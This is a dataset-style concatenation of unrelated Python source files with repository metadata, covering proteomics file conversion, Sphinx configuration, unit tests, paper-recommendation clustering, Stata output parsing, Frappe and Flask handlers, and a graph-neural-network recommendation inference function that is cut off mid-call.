] | null | null | null | lang/Python/singly-linked-list-traversal-1.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/singly-linked-list-traversal-1.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | for node in lst:
print(node.value)
| 13 | 21 | 0.666667 |
f9ef1102a1c613bcb45da31777d89452e59168b6 | 2,625 | py | Python | conversion_tools/misc_functions.py | xiaoping-yang/ms2pip_c | 061fcd8aa8c315b775ac64f5c1f7dfe0a09bdea9 | [
"Apache-2.0"
] | 14 | 2018-08-21T04:58:22.000Z | 2022-03-21T11:40:12.000Z | conversion_tools/misc_functions.py | xiaoping-yang/ms2pip_c | 061fcd8aa8c315b775ac64f5c1f7dfe0a09bdea9 | [
"Apache-2.0"
] | 69 | 2018-05-23T12:52:16.000Z | 2022-03-14T20:42:49.000Z | conversion_tools/misc_functions.py | xiaoping-yang/ms2pip_c | 061fcd8aa8c315b775ac64f5c1f7dfe0a09bdea9 | [
"Apache-2.0"
] | 10 | 2019-04-28T01:24:10.000Z | 2022-03-04T18:37:47.000Z | """
Miscellaneous functions regarding MS2PIP file conversions.
"""
import re
import pandas as pd
def add_fixed_mods(peprec, fixed_mods=None, n_term=None, c_term=None):
"""
Add 'fixed' modifications to all peptides in an MS2PIP PEPREC file.
Return list with MS2PIP modifications with fixed mods added.
Positional arguments:
peprec - MS2PIP PEPREC DataFrame
Keyword arguments:
fixed_mods - List of tuples. First tuple element is amino acid, second tuple
element is modification name. E.g. `[('K', 'TMT6plex')]`
n_term - Name of fixed N-terminal modification to add
c_term - Name of fixed C-terminal modification to add
"""
if not fixed_mods:
fixed_mods = []
result = []
for _, row in peprec.iterrows():
mods = row['modifications']
if mods == '-':
mods = []
else:
mods = mods.split('|')
current_mods = list(zip([int(i) for i in mods[::2]], mods[1::2]))
for aa, mod in fixed_mods:
current_mods.extend([(m.start()+1, mod) for m in re.finditer(aa, row['peptide'])])
if n_term and not 0 in [i for i, n in current_mods]:
current_mods.append((0, n_term))
if c_term and not -1 in [i for i, n in current_mods]:
current_mods.append((-1, c_term))
current_mods = sorted(current_mods, key=lambda x: x[0])
current_mods = '|'.join(['|'.join(m) for m in [(str(i), n) for i, n in current_mods]])
result.append(current_mods)
return result
def peprec_add_charges(peprec_filename, mgf_filename, overwrite=False):
"""
Get precursor charges from MGF file and add them to a PEPREC
"""
peprec = pd.read_csv(peprec_filename, sep=' ', index_col=None)
if not overwrite and 'charge' in peprec.columns:
print('Charges already in PEPREC')
return None
spec_count = 0
charges = {}
with open(mgf_filename, 'rt') as f:
for line in f:
if line.startswith('TITLE='):
title = line[6:].strip()
spec_count += 1
if line.startswith('CHARGE='):
charge = line[7:].strip()
charges[title] = charge
if not spec_count == len(charges):
print('Something went wrong')
return None
peprec['charge'] = peprec['spec_id'].map(charges)
new_peprec_filename = re.sub('\.peprec$|\.PEPREC$', '', peprec_filename) + '_withcharges.peprec'
peprec.to_csv(new_peprec_filename, sep=' ', index=False)
print('PEPREC with charges written to ' + new_peprec_filename)
return peprec | 30.882353 | 100 | 0.613333 |
f9f160c2036c4a9de666283011c042c949cb5728 | 2,518 | py | Python | docs/conf.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 2 | 2020-08-26T11:24:43.000Z | 2021-07-28T09:46:40.000Z | docs/conf.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 153 | 2020-08-26T10:45:35.000Z | 2021-12-10T17:33:16.000Z | docs/conf.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
import os
import sys
import django
sys.path.insert(0, os.path.abspath("../src"))
import openpersonen # noqa isort:skip
from openpersonen.setup import setup_env # noqa isort:skip
setup_env()
django.setup()
# -- Project information -----------------------------------------------------
project = "Open Personen"
copyright = "2020, Maykin Media"
author = openpersonen.__author__
# The full version, including alpha/beta/rc tags
release = openpersonen.__version__
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.todo",
"sphinx_tabs.tabs",
"recommonmark",
# "sphinx_markdown_tables",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = "en"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
source_suffix = [".rst", ".md"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_logo = "logo.png"
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
html_css_files = [
'theme_overrides.css', # override wide tables with word wrap
]
todo_include_todos = True
linkcheck_ignore = [
r"https?://.*\.gemeente.nl",
r"http://localhost:\d+/",
r"https://.*sentry.*",
]
| 29.97619 | 78 | 0.673153 |
f9f1a4c66877c2a359160ca92cd9a1a5bd503f2e | 1,547 | py | Python | tests/test_preprocessing.py | mitchelllisle/leonard | 09f2f72d1f103813233c19950189a502868ce60a | [
"MIT"
] | null | null | null | tests/test_preprocessing.py | mitchelllisle/leonard | 09f2f72d1f103813233c19950189a502868ce60a | [
"MIT"
] | 27 | 2018-04-05T22:32:11.000Z | 2018-12-09T21:04:12.000Z | tests/test_preprocessing.py | mitchelllisle/leonard | 09f2f72d1f103813233c19950189a502868ce60a | [
"MIT"
] | null | null | null | import pytest
from martha import negabs
from martha import normalise
from martha import labelEncoder
from martha import cleanUpString
from martha import medianFrequency
from martha import gini
import numpy as np
import pandas as pd
import json
from sklearn.preprocessing import LabelEncoder
# import os
# os.chdir("/Users/mitchell/Documents/projects/martha")
def test_negabs():
data = pd.read_csv("data/marvelMovies.csv")
result = data.assign(ProductionBudget = data.ProductionBudget.apply(lambda x: negabs(x)))
result = result.ProductionBudget.apply(lambda x: x < 0)
assert any(result) == True
def test_normalise():
data = pd.read_csv("data/marvelMovies.csv")
result = data.assign(score = normalise(data['ProductionBudget']))
assert 'score' in result.columns
def test_labelEncoder():
data = pd.read_csv("data/fifaAbilities.csv")
result = data.assign(preferred_foot_encoded = labelEncoder(data, "preferred_foot"))
assert result.preferred_foot_encoded.dtype == 'int64'
def test_cleanUpString():
data = "test, \n"
result = cleanUpString(data, strip_chars = [','], replace_extras = {"t" : "--"})
assert result == '--es--'
def test_medianFrequency():
data = {"values" : [1,2,4], "repeats" : [4,4,2]}
values = pd.Series(data['values'])
repeats = pd.Series(data['repeats'])
computedMedian = medianFrequency(values, repeats)
assert computedMedian == 2
def test_gini():
data = pd.read_csv("data/fifaAbilities.csv")
assert gini(data['marking']) == 0.3441157017683561
| 31.571429 | 93 | 0.716225 |
f9f1e55a1cfe8220ba10d8a734bbe623347c9690 | 7,806 | py | Python | Recommendation_System/Research_Recommender/Research_Recommender_Clustering.py | quangnguyendang/Reinforcement_Learning | 2551ce95068561c553500838ee6b976f001ba667 | [
"MIT"
] | null | null | null | Recommendation_System/Research_Recommender/Research_Recommender_Clustering.py | quangnguyendang/Reinforcement_Learning | 2551ce95068561c553500838ee6b976f001ba667 | [
"MIT"
] | null | null | null | Recommendation_System/Research_Recommender/Research_Recommender_Clustering.py | quangnguyendang/Reinforcement_Learning | 2551ce95068561c553500838ee6b976f001ba667 | [
"MIT"
] | null | null | null | # Example of CBF for research-paper domain
# Nguyen Dang Quang
from nltk.stem.snowball import SnowballStemmer
import pandas as pd
from nltk.corpus import stopwords
# --------------------------------------------------------
user_input_data = "It is known that the performance of an optimal control strategy obtained from an off-line " \
"computation is degraded under the presence of model mismatch. In order to improve the control " \
"performance, a hybrid neural network and on-line optimal control strategy are proposed in this " \
"study and demonstrated for the control of a fed-batch bioreactor for ethanol fermentation. The " \
"information of the optimal feed profile of the fed-batch reactor. The simulation results show " \
"that the neural network provides a good estimate of unmeasured variables and the on-line optimal " \
"control with the neural network estimator gives a better control performance in terms of the " \
"amount of the desired ethanol product, compared with a conventional off-line optimal control " \
"method."
user_title = "user undefined title"
# --------------------------------------------------------
metadata = pd.read_json('sample-records', lines=True)
user_data = pd.DataFrame([[user_input_data, user_title]], columns=['paperAbstract', 'title'])
metadata = pd.concat([metadata, user_data], sort=True).fillna('')
filter_na = metadata["paperAbstract"] != ''
metadata = metadata[filter_na]
# Lower the characters
def clean_data(x):
if isinstance(x, list):
list_data = []
for i in x:
list_data.append(str.lower(str(i)))
return list_data
elif isinstance(x, str):
return str.lower(str(x))
else:
return ' '
# turn list of string items into string
def get_string(x):
if isinstance(x, list):
names = ''
for i in x:
names = names + i['name'] + " "
return names
else:
return str(x)
# turn list of entity string items into string
def get_entity(x):
if isinstance(x, list):
names = ''
for i in x:
names = names + str(i) + " "
return names
else:
return str(x)
# Apply clean_data function to your features.
features = ['authors', 'title', 'journalName', 'paperAbstract']
for feature in features:
metadata[feature] = metadata[feature].apply(get_string)
metadata[feature] = metadata[feature].apply(clean_data)
metadata['entities'] = metadata['entities'].apply(get_entity)
# Create metadata soup
def create_soup(x):
return x['journalName'] + ' ' + x['title'] + ' ' + x['title'] + ' ' + x['paperAbstract'] + ' ' + x['entities'] + ' ' + x['entities'] + ' ' + x['entities']
metadata['soup'] = metadata.apply(create_soup, axis=1)
# --------------------------------------------------------
stemmer = SnowballStemmer("english")
def word_stem_and_stopword_remove(x1):
x = x1['soup']
final = ''
for y in x.split(' '):
if y not in stopwords.words('english'):
final = final + stemmer.stem(y) + ' '
return final
metadata['filtered'] = metadata.apply(word_stem_and_stopword_remove, axis=1)
# Print metadata for the first 5 films
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', 100):
print(metadata[['soup', 'filtered']].head(5))
print('\n\n Done Pre-processing Data \n\n')
# --------------------------------------------------------
# TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
tvec = TfidfVectorizer(min_df=1, max_df=10, stop_words='english', ngram_range=(1, 2))
tvec_weights = tvec.fit_transform(metadata.filtered.dropna())
# --------------------------------------------------------
# Classifier for User's Text - K-MEAN - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=24, random_state=0).fit(tvec_weights)
# print('metadata shape = ', metadata.filtered.shape)
# print('k-mean shape = ', kmeans.labels_.shape)
metadata['cluster_number_kmean'] = kmeans.labels_
# User Data and similar papers
def find_cluster_data_kmean(title):
print('\n\nSimilar papers using K-mean Clustering: \n')
filter_title = metadata['title'] == title
user_cluster = str(metadata.loc[filter_title].cluster_number_kmean.item())
similar_papers = metadata.loc[metadata['cluster_number_kmean'] == int(user_cluster)].title
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(similar_papers)
find_cluster_data_kmean(user_title)
# --------------------------------------------------------
# Classifier for User's Text - Birch - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.Birch.html#sklearn.cluster.Birch
from sklearn.cluster import Birch
brc = Birch(branching_factor=50, n_clusters=24, threshold=0.5, compute_labels=True)
brc.fit(tvec_weights)
metadata['cluster_number_birch'] = brc.labels_
# User Data and similar papers
def find_cluster_data_birch(title):
print('\n\nSimilar papers using Birch Clustering: \n')
filter_title = metadata['title'] == title
user_cluster = str(metadata.loc[filter_title].cluster_number_birch.item())
similar_papers = metadata.loc[metadata['cluster_number_birch'] == int(user_cluster)].title
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(similar_papers)
find_cluster_data_birch(user_title)
# --------------------------------------------------------
# Classifier for User's Text - Agglomerative Clustering - http://scikit-learn.org/stable/modules/clustering.html#hierarchical-clustering
from sklearn.cluster import AgglomerativeClustering
# User Data and similar papers
def find_cluster_data_Agglomerative(title):
print('Similar papers using Agglomerative Clustering: \n')
filter_title = metadata['title'] == title
user_cluster = str(metadata.loc[filter_title].cluster_number_Agglomerative.item())
similar_papers = metadata.loc[metadata['cluster_number_Agglomerative'] == int(user_cluster)].title
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(similar_papers)
for linkage in ('ward', 'average', 'complete'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=24)
clustering.fit(tvec_weights.toarray())
metadata['cluster_number_Agglomerative'] = clustering.labels_
print('\n\nAgglomerative Clustering - ', linkage)
find_cluster_data_Agglomerative(user_title)
# --------------------------------------------------
# COSINE SIMILARITY
from sklearn.metrics.pairwise import cosine_similarity
# Find the similar movie
def get_recommendations(title, cosine_sim):
# Get the index of the paper that matches to the title
idx = indices.loc[title]
# Get the pairwise similarity scores of all paper with that movie
sim_scores = list(enumerate(cosine_sim[idx]))
# Sort the papers based on the similarity scores
sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
sim_scores = sim_scores[0:5]
# Get the paper indices
paper_indices = [i[0] for i in sim_scores]
return metadata['title'].iloc[paper_indices]
cosine_sim = cosine_similarity(tvec_weights, tvec_weights)
indices = pd.Series(metadata.index, index=metadata['title'])
print('\n\nSimilar paper using Cosine Similarity: \n')
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(get_recommendations(user_title, cosine_sim))
| 38.264706 | 158 | 0.668204 |
f9f282edbab72aad8652828b7e20e00859536805 | 5,625 | py | Python | extract_from_stata/model/regressions.py | gn0/extract-from-stata | 52f94f65d28aee257c2a46ca82149e14ab74fbda | [
"CC-BY-4.0"
] | null | null | null | extract_from_stata/model/regressions.py | gn0/extract-from-stata | 52f94f65d28aee257c2a46ca82149e14ab74fbda | [
"CC-BY-4.0"
] | null | null | null | extract_from_stata/model/regressions.py | gn0/extract-from-stata | 52f94f65d28aee257c2a46ca82149e14ab74fbda | [
"CC-BY-4.0"
] | null | null | null | import re
import collections
import extract_from_stata.model.common
def is_beginning_of_table(line):
    """Return True if *line* looks like the first line of a Stata results table."""
    known_prefixes = (
        "Linear regression",
        "Negative binomial regression",
        "HDFE Linear regression",
        # reghdfe IV estimation:
        "Estimates efficient for homoskedasticity only",
        # margins:
        "Average marginal effects",
    )
    if line.startswith(known_prefixes):
        return True
    # ANOVA-style header of plain `regress` output: "  Source |  SS  df  MS".
    return re.match(r"^ +Source \| +SS +df +MS", line) is not None
def find_first_table_in(string):
    """Return the first results table found in *string*.

    Accumulates lines starting at a table header (is_beginning_of_table)
    and stops at the first blank line that follows a dashed rule.
    """
    collected = []
    for line in string.splitlines(True):
        if is_beginning_of_table(line):
            collected.append(line)
            continue
        if not collected:
            # Still before the table starts.
            continue
        if line.strip():
            collected.append(line)
            continue
        # Blank line: the table is over once a dashed rule has been seen;
        # otherwise the blank line is still part of the table preamble.
        if re.search(r"^----+$", "".join(collected), flags=re.M):
            break
        collected.append(line)
    return "".join(collected)
# Inline smoke test: the table runs from its header line through the first
# blank line that follows a dashed rule.
assert (find_first_table_in(
    "foo\nbar\nLinear regression\n\n----\nfoo\nbar\n\nlipsum\n")
        == "Linear regression\n\n----\nfoo\nbar\n")
def param_to_show_categoricals(parameters):
    """True when a 'show_categoricals' flag appears among *parameters* (name/value pairs)."""
    return any(name == "show_categoricals" for name, _value in parameters)
def param_to_show_constant(parameters):
    """True when a 'show_constant' flag appears among *parameters* (name/value pairs)."""
    return any(name == "show_constant" for name, _value in parameters)
def extract_sample_size(table_string):
    """Pull the 'Number of obs' figure out of *table_string*.

    Returns the count as a string with thousands separators removed,
    or None when the line is absent.
    """
    found = re.search(r"Number of obs += +([\d,]+)", table_string)
    if found is None:
        return None
    return found.group(1).replace(",", "")
def extract_number_of_clusters(table_string):
    """Return the cluster count from an '… adjusted for N clusters in …' note, or None."""
    found = re.search(r"adjusted for (\d+) clusters in", table_string)
    return found.group(1) if found else None
def _extract_depvar_from_table_header(table_string):
pattern = re.compile(r"^ *([A-Za-z0-9_~]+) +\| +Coef[.] ")
for line in table_string.splitlines():
match = pattern.match(line)
if match is None:
continue
return match.group(1)
return None # This shouldn't be reached.
def _extract_depvar_from_table_preamble(table_string):
pattern = re.compile(r"^Expression *: +Pr\(([^)]+)\)")
for line in table_string.splitlines():
match = pattern.match(line)
if match is not None:
return match.group(1)
return None
def extract_dependent_variable(table_string):
    """Return the dependent variable, preferring the preamble over the table header."""
    from_preamble = _extract_depvar_from_table_preamble(table_string)
    if from_preamble is not None:
        return from_preamble
    return _extract_depvar_from_table_header(table_string)
def extract_categorical_variable(line):
    """If *line* is a categorical-block header row ('  varname |'), return the name, else None."""
    hit = re.match(r"^ *([A-Za-z0-9_~#.]+) +\| *$", line)
    return hit.group(1) if hit else None
def is_start_of_new_block(line):
    """True when *line* opens a categorical-variable block inside the table body."""
    return extract_categorical_variable(line) is not None
# Inline smoke tests: a block header row has only a name and a bare '|',
# while an ordinary coefficient row does not start a block.
assert is_start_of_new_block(" birth_year |")
assert not is_start_of_new_block(
    " saw_protest | .0500882 .0193186")
def is_end_of_block(line):
    """True when *line* terminates a categorical block: a dashed rule or a name-less '   |' row."""
    if line.startswith("----"):
        return True
    return re.match(r"^ +\| *$", line) is not None
def extract_coefficients(table_string, parameters):
    """Parse the coefficient rows of a Stata results table.

    Returns an OrderedDict mapping variable name -> dict with keys
    'coefficient', 'std_error' and 'p_value' (all kept as strings).
    Rows inside categorical blocks are skipped unless the
    'show_categoricals' parameter is set; '_cons' is skipped unless
    'show_constant' is set.
    """
    # Groups: 1=variable name, 2=coefficient, 3=std. error, 4=p-value.
    # The t/z statistic between groups 3 and 4 is matched but not captured.
    pattern = re.compile(r"^ *([A-Za-z0-9_~#. ]+) +\| +(-?[0-9.e-]+) +([0-9.e-]+) +-?[0-9.]+ +([0-9.]+)")
    coefficients = collections.OrderedDict()
    # Small state machine: skip lines until the dashed rule that opens the
    # header, then until the '----+--' rule that opens the table body.
    segment = "pre-header"
    categorical_block = False
    categorical_variable = None
    for line in table_string.splitlines():
        if segment == "pre-header" and re.match(r"^----+$", line):
            segment = "header"
        elif segment == "header" and re.match(r"^----+[+]-+$", line):
            segment = "post-header"
        elif segment == "post-header":
            if categorical_block and is_end_of_block(line):
                categorical_block = False
            elif is_start_of_new_block(line):
                categorical_block = True
                categorical_variable = extract_categorical_variable(
                    line)
            elif (categorical_block
                  and not param_to_show_categoricals(parameters)):
                continue
            else:
                match = pattern.match(line)
                if match is None:
                    continue
                elif (match.group(1) == "_cons"
                      and not param_to_show_constant(parameters)):
                    continue
                if categorical_block:
                    # Qualify the level with its categorical variable,
                    # e.g. '1990.birth_year'.
                    variable_name = "%s.%s" % (match.group(1).strip(),
                                               categorical_variable)
                else:
                    # NOTE(review): group 1 can carry trailing spaces here
                    # (its character class includes ' '); only the
                    # categorical branch strips — confirm intended.
                    variable_name = match.group(1)
                coefficients[variable_name] = (
                    dict(coefficient=match.group(2),
                         std_error=match.group(3),
                         p_value=match.group(4)))
    return coefficients
def parse_regression(block):
    """Parse one regression output *block* into a summary dict.

    Bundles the sample size, cluster count, dependent-variable name,
    coefficient table, and the raw parameters found in the block (via
    extract_from_stata.model.common.find_parameters_in).
    """
    table_string = find_first_table_in(block)
    parameters = extract_from_stata.model.common.find_parameters_in(block)
    return dict(sample_size=extract_sample_size(table_string),
                number_of_clusters=extract_number_of_clusters(
                    table_string),
                dependent_variable=extract_dependent_variable(
                    table_string),
                coefficients=extract_coefficients(
                    table_string, parameters),
                parameters=parameters)
| 29.450262 | 105 | 0.592889 |
f9f39222109d35dd54c9520459d1d2c222c58e13 | 1,173 | py | Python | master/master/doctype/add_rate/add_rate.py | reddymeghraj/master | 1f93748fb951e52edc28c1b8c150d1acacff1687 | [
"MIT"
] | null | null | null | master/master/doctype/add_rate/add_rate.py | reddymeghraj/master | 1f93748fb951e52edc28c1b8c150d1acacff1687 | [
"MIT"
] | null | null | null | master/master/doctype/add_rate/add_rate.py | reddymeghraj/master | 1f93748fb951e52edc28c1b8c150d1acacff1687 | [
"MIT"
] | null | null | null | # Copyright (c) 2013, Wayzon and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class AddRate(Document):
    """Rate record keyed by (brand, brand_type)."""

    def validate(self):
        """If a row for this (brand, brand_type) already exists, refresh its rate in place."""
        existing = frappe.db.sql(
            """select brand,brand_type from `tabAdd Rate` where brand=%s and brand_type=%s""",
            (self.brand, self.brand_type))
        if existing:
            frappe.db.sql(
                """update `tabAdd Rate` set rate=%s where brand=%s and brand_type=%s""",
                (self.rate, self.brand, self.brand_type))

    def before_insert(self):
        """Refuse to insert a duplicate (brand, brand_type) pair."""
        existing = frappe.db.sql(
            """select brand,brand_type from `tabAdd Rate` where brand=%s and brand_type=%s""",
            (self.brand, self.brand_type))
        if existing:
            frappe.throw("Entry already exists for selected Brand,brandtype")
@frappe.whitelist()
def get_latest_purchase_rate(b, bt):
    """Return the rate of the most recent purchase for brand *b* / brand type *bt*.

    Falls back to 0 (and informs the user) when no purchase exists yet.
    Exposed to the client via @frappe.whitelist(); parameter names b/bt
    are kept because client-side calls pass them by name.
    """
    rows = frappe.db.sql(
        """select p.date,pi.brand,pi.brand_name,pi.brand_type,pi.type_name,pi.rate
    from `tabPurchaseinfo` pi,`tabPurchase` p
    where p.name=pi.parent and pi.brand=%s and pi.brand_type=%s
    order by date desc limit 1""",
        (b, bt))
    if rows:
        # Column index 5 of the select list is pi.rate.
        return rows[0][5]
    # Typo fixed in the user-facing message: "tll" -> "till".
    frappe.msgprint("Selected Brand,brandtype are not purchased till now")
    return 0
f9f39e941eb9fa32c988e9be54fb0bea84a7c4e4 | 45 | py | Python | nautobot_plugin_nornir/tests/__init__.py | FragmentedPacket/nautobot-plugin-nornir | ef3ce9e1eb1d8e04002f0f5c3f5e34389ada20cb | [
"Apache-2.0"
] | 13 | 2021-02-28T00:21:31.000Z | 2022-03-10T13:04:50.000Z | nautobot_plugin_nornir/tests/__init__.py | rileyL6122428/nautobot-plugin-nornir | 67773960aebe4df5e6cda11f1c7e0bfd93c24fee | [
"Apache-2.0"
] | 18 | 2021-03-13T03:24:09.000Z | 2022-02-28T15:24:51.000Z | nautobot_plugin_nornir/tests/__init__.py | rileyL6122428/nautobot-plugin-nornir | 67773960aebe4df5e6cda11f1c7e0bfd93c24fee | [
"Apache-2.0"
] | 14 | 2021-03-04T03:21:16.000Z | 2021-12-20T10:20:55.000Z | """Unit tests for nautobot_plugin_nornir."""
| 22.5 | 44 | 0.755556 |
f9f6b1140ade48b9437ab03cfc7f614535b44fee | 1,267 | py | Python | oxe-api/resource/private/get_my_companies.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/resource/private/get_my_companies.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/resource/private/get_my_companies.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | from flask_apispec import MethodResource
from flask_apispec import doc
from flask_jwt_extended import jwt_required, get_jwt_identity
from flask_restful import Resource
from db.db import DB
from decorator.catch_exception import catch_exception
from decorator.log_request import log_request
from utils.serializer import Serializer
class GetMyCompanies(MethodResource, Resource):
    """REST resource returning the companies assigned to the authenticated user."""

    def __init__(self, db: DB):
        self.db = db

    @log_request
    @doc(tags=['private'],
         description='Get the list of companies assigned to the user authenticated by the token',
         responses={
             "200": {},
         })
    @jwt_required
    @catch_exception
    def get(self):
        assignment_table = self.db.tables["UserCompanyAssignment"]
        company_table = self.db.tables["Company"]

        # IDs of companies assigned to the caller, as a subquery.
        assigned_company_ids = self.db.session \
            .query(assignment_table) \
            .with_entities(assignment_table.company_id) \
            .filter(assignment_table.user_id == get_jwt_identity()) \
            .subquery()

        companies = self.db.session \
            .query(company_table) \
            .filter(company_table.id.in_(assigned_company_ids)) \
            .all()

        data = Serializer.serialize(companies, company_table)

        # NOTE(review): the trailing space in "200 " is preserved from the
        # original — confirm whether a plain "200" / int status was intended.
        return data, "200 "
| 30.902439 | 97 | 0.649566 |
f9f91708559004c1587db8bf5fbe2a059ca12bc6 | 9,693 | py | Python | src/recommendation/main_inference.py | AntoninJoly/book | 257c641fd52d0e9499093247727b135ed361d7c4 | [
"Apache-2.0"
] | null | null | null | src/recommendation/main_inference.py | AntoninJoly/book | 257c641fd52d0e9499093247727b135ed361d7c4 | [
"Apache-2.0"
] | null | null | null | src/recommendation/main_inference.py | AntoninJoly/book | 257c641fd52d0e9499093247727b135ed361d7c4 | [
"Apache-2.0"
] | null | null | null | import math
import click
import dgl
import numpy as np
import torch
from src.builder import create_graph
from src.model import ConvModel
from src.utils_data import DataPaths, DataLoader, FixedParameters, assign_graph_features
from src.utils_inference import read_graph, fetch_uids, postprocess_recs
from src.train.run import get_embeddings
from src.metrics import get_recs, create_already_bought
from src.utils import read_data
cuda = torch.cuda.is_available()
device = torch.device('cuda') if cuda else torch.device('cpu')
num_workers = 4 if cuda else 0
def inference_ondemand(user_ids,  # List or 'all'
                       use_saved_graph: bool,
                       trained_model_path: str,
                       use_saved_already_bought: bool,
                       graph_path=None,
                       ctm_id_path=None,
                       pdt_id_path=None,
                       already_bought_path=None,
                       k=10,
                       remove=.99,
                       **params,
                       ):
    """
    Given a fully trained model, return recommendations specific to each user.

    Files needed to run
    -------------------
    Params used when training the model:
        Those params will indicate how to run inference on the model. Usually, they are outputted during training
        (and hyperparametrization).
    If using a saved already bought dict:
        The already bought dict: the dict includes all previous purchases of all user ids for which recommendations
                                 were requested. If not using a saved dict, it will be created using the graph.
                                 Using a saved already bought dict is not necessary, but might make the inference
                                 process faster.
    A) If using a saved graph:
        The saved graph: the graph that must include all user ids for which recommendations were requested. Usually,
                         it is outputted during training. It could also be created by another independent function.
        ID mapping: ctm_id and pdt_id mapping that allows to associate real-world information, e.g. item and customer
                    identifier, to actual nodes in the graph. They are usually saved when generating a graph.
    B) If not using a saved graph:
        The graph will be generated on demand, using all the files in DataPaths of src.utils_data. All those files will
        be needed.

    Parameters
    ----------
    See click options below for details.

    Returns
    -------
    Recommendations for all user ids.
    """
    # Load & preprocess data
    ## Graph
    if use_saved_graph:
        graph = read_graph(graph_path)
        ctm_id_df = read_data(ctm_id_path)
        pdt_id_df = read_data(pdt_id_path)
    else:
        # Create graph
        data_paths = DataPaths()
        fixed_params = FixedParameters(num_epochs=0, start_epoch=0,  # Not used (only used in training)
                                       patience=0, edge_batch_size=0,  # Not used (only used in training)
                                       remove=remove, item_id_type=params['item_id_type'],
                                       duplicates=params['duplicates'])
        data = DataLoader(data_paths, fixed_params)
        ctm_id_df = data.ctm_id
        pdt_id_df = data.pdt_id
        graph = create_graph(
            data.graph_schema,
        )
        graph = assign_graph_features(graph,
                                      fixed_params,
                                      data,
                                      **params,
                                      )
    ## Preprocess: fetch right user ids
    # NOTE(review): assumes user_ids is a non-empty sequence — user_ids[0]
    # raises IndexError on an empty input.
    if user_ids[0] == 'all':
        test_uids = np.arange(graph.num_nodes('user'))
    else:
        test_uids = fetch_uids(user_ids,
                               ctm_id_df)
    ## Remove already bought
    if use_saved_already_bought:
        already_bought_dict = read_data(already_bought_path)
    else:
        bought_eids = graph.out_edges(u=test_uids, form='eid', etype='buys')
        already_bought_dict = create_already_bought(graph, bought_eids)
    # Load model
    # Input feature widths are read off the graph; out/hidden come from params.
    dim_dict = {'user': graph.nodes['user'].data['features'].shape[1],
                'item': graph.nodes['item'].data['features'].shape[1],
                'out': params['out_dim'],
                'hidden': params['hidden_dim']}
    if 'sport' in graph.ntypes:
        dim_dict['sport'] = graph.nodes['sport'].data['features'].shape[1]
    trained_model = ConvModel(
        graph,
        params['n_layers'],
        dim_dict,
        params['norm'],
        params['dropout'],
        params['aggregator_type'],
        params['pred'],
        params['aggregator_hetero'],
        params['embedding_layer'],
    )
    trained_model.load_state_dict(torch.load(trained_model_path, map_location=device))
    if cuda:
        trained_model = trained_model.to(device)
    # Create dataloader
    all_iids = np.arange(graph.num_nodes('item'))
    test_node_ids = {'user': test_uids, 'item': all_iids}
    n_layers = params['n_layers']
    if params['embedding_layer']:
        # The embedding layer is not a message-passing layer: sample one hop less.
        n_layers = n_layers - 1
    sampler = dgl.dataloading.MultiLayerFullNeighborSampler(n_layers)
    nodeloader_test = dgl.dataloading.NodeDataLoader(
        graph,
        test_node_ids,
        sampler,
        batch_size=128,
        shuffle=True,
        drop_last=False,
        num_workers=num_workers
    )
    # Keep this 128 in sync with batch_size above.
    num_batches_test = math.ceil((len(test_uids) + len(all_iids)) / 128)
    # Fetch recs
    trained_model.eval()
    with torch.no_grad():
        embeddings = get_embeddings(graph,
                                    params['out_dim'],
                                    trained_model,
                                    nodeloader_test,
                                    num_batches_test,
                                    cuda,
                                    device,
                                    params['embedding_layer'],
                                    )
        recs = get_recs(graph,
                        embeddings,
                        trained_model,
                        params['out_dim'],
                        k,
                        test_uids,
                        already_bought_dict,
                        remove_already_bought=True,
                        cuda=cuda,
                        device=device,
